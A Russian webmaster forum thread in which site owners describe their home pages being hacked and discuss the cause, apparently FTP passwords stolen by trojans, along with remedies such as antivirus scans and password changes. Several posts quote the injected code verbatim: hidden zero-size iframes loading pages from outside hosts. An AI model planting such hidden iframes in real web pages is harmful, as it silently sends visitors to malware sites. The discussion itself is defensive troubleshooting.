Форум Не про работу Самое разное

Взлом сайтов

Сережка
На сайте с 12.01.2007
Offline
97
Сережка
784

У меня на практически всех моих проектах полетели главные странички. В место них:

 <!-- ~ --><iframe src="http://zarabotokis.or.kz/guest/base/general/1/index.php" width="0" height="0" marginwidth="0"

marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ -->><!-- ~ --><iframe src="http://zarabotokis.or.kz/guest/base/general/1/index.php" width="0" height="0" marginwidth="0"

marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ -->

кто-то может что-то подсказать, где искать начало? сайты находятся на разных хостингах.

Семён-Ядрён (http://seo-case.com/zakaz_996/submit_brief.html) - Качественное семантическое ядро для Вашего сайта!
S
На сайте с 20.04.2004
Offline
145
sss
#1
Сережка:
У меня на практически всех моих проектах полетели главные странички. В место них:
 <!-- ~ --><iframe src="http://zarabotokis.or.kz/guest/base/general/1/index.php" width="0" height="0" marginwidth="0"

marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ -->><!-- ~ --><iframe src="http://zarabotokis.or.kz/guest/base/general/1/index.php" width="0" height="0" marginwidth="0"

marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ -->

кто-то может что-то подсказать, где искать начало? сайты находятся на разных хостингах.

тогда для начала ищите у себя заразу, которая отослала ваши пароли - можете запросить логи у хостеров - если заход под вашим логином в то время, когда вас не было - моя теория верна :)

меняйте все пароли и молитесь, чтобы снесли только главные страницы.

-AlexK-
На сайте с 10.04.2006
Offline
21
-AlexK-
#2
Сережка:
У меня на практически всех моих проектах полетели главные странички. В место них:
 <!-- ~ --><iframe src="http://zarabotokis.or.kz/guest/base/general/1/index.php" width="0" height="0" marginwidth="0"

marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ -->><!-- ~ --><iframe src="http://zarabotokis.or.kz/guest/base/general/1/index.php" width="0" height="0" marginwidth="0"

marginheight="0" scrolling="no" frameborder="0"></iframe> <!-- ~ -->

кто-то может что-то подсказать, где искать начало? сайты находятся на разных хостингах.

Вирус. Поиском воспользуйтесь. На форуме уже месяц почти обсуждают.

Вот первое, что попалось под руку - /ru/forum/126831

"Останься... в живых"
Сережка
На сайте с 12.01.2007
Offline
97
Сережка
#3
тогда для начала ищите у себя заразу, которая отослала ваши пароли - можете запросить логи у хостеров - если заход под вашим логином в то время, когда вас не было - моя теория верна

меняйте все пароли и молитесь, чтобы снесли только главные страницы.

Хостер анализирует, но пока нет результатов.

Вирус. Поиском воспользуйтесь. На форуме уже месяц почти обсуждают.
Вот первое, что попалось под руку - /ru/forum/126831

спасибо за ссылочку.

у нас в сети 4 компа. на двух есть тотал с паролями, а на третьем - куча вирусов. антивирус стоит, но не делали глубокий анализ!!! а сейчас их убили,будем смотреть далее...

PIN_KOD
На сайте с 19.11.2006
Offline
85
PIN_KOD
#4

Сережка, 100 % вирус.

Вот что пишут на sweb

Уважаемые клиенты! В связи с активизацией вирусов, похищающих пароли от ftp-аккаунтов, просим вас внимательнее относится к хранению ваших паролей. По возможности, не сохраняйте пароли в ftp-клиентах, вирусы пытаются достать информацию из конфигурации ftp-клиентов. Пользуйтесь антивирусами и firewall'ами.

Так же, старайтесь использовать длиные, "сложные" пароли, состоящие из цифр, строчных и заглавных букв. Хорошая практика - регулярная смена паролей.

Сережка
На сайте с 12.01.2007
Offline
97
Сережка
#5
PIN_KOD:
Сережка, 100 % вирус.
Вот что пишут на sweb
Уважаемые клиенты! В связи с активизацией вирусов, похищающих пароли от ftp-аккаунтов, просим вас внимательнее относится к хранению ваших паролей. По возможности, не сохраняйте пароли в ftp-клиентах, вирусы пытаются достать информацию из конфигурации ftp-клиентов. Пользуйтесь антивирусами и firewall'ами.

Так же, старайтесь использовать длиные, "сложные" пароли, состоящие из цифр, строчных и заглавных букв. Хорошая практика - регулярная смена паролей.

пока у меня - не видно, но еще не все проверено.

а может вирус по сети украсть пароли к ftp через другой комп?

WwWork
На сайте с 07.02.2006
Offline
150
WwWork
#6

У меня такая же фигня..

Однако в Самих шаблонах Этого нет.

Видать при компиляции и выводе html добавляется.

Антивирусную дома обновляю постоянно.

В исходниках ничего такого не обнаружено... 

</body>

</html>

<!-- ~ --><iframe src="http://ltds.biz/go.php?id=2694&user_name=asd123" width=1 height=1></iframe><iframe src="http://ltds.biz/go.php?id=2607&user_name=810876" width=1 height=1></iframe><!-- ~ -->
T
На сайте с 11.08.2005
Offline
181
Timen
#7
WwWork:
У меня такая же фигня..
Однако в Самих шаблонах Этого нет.
Видать при компиляции и выводе html добавляется.
Антивирусную дома обновляю постоянно.
В исходниках ничего такого не обнаружено...

В исходниках ничего и не будет...

Речь идет о краже трояном или другим типом вирусов паролей к ФТП Вашего сайта/сайтов. После чего можно прямо на сервере менять страницы сайта (дописывать коды, модифицировать и т.п.).

Очень рекомендую проверить комп. на вирусы и сменить ФТП пароли. В любом случае, это лишним не будет.

PS: Вчера у сотрудницы NOD32 словил трояна, что «натянул» 1,4Гб трафика за 6 часов. При этом AVAST даже не ругался. Это я к тому, что стоит попробовать другие антивирусы. ☝

Timen (http://www.timen.com.ua/)
AN
На сайте с 05.06.2004
Offline
243
AnNik
#8
Сережка:
а может вирус по сети украсть пароли к ftp через другой комп?

Да.

...........

Размещу ваши баннеры на посещаемых сайтах. Места еще есть! Возможен безнал. (/ru/forum/324945) Нужны копирайтеры/рерайтеры - медики. Пишите в личку. (/ru/forum/676932)
S
На сайте с 28.10.2005
Offline
296
semenov
#9

Сделал онлайн проверку страницы на наличие фреймов - http://ssve.ru/frames, может кому пригодится

Тест: http://ssve.ru/frames?url=http%3A%2F%2Fwww.postroika.ru%2Fhtml%2Ffzpr3.html

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий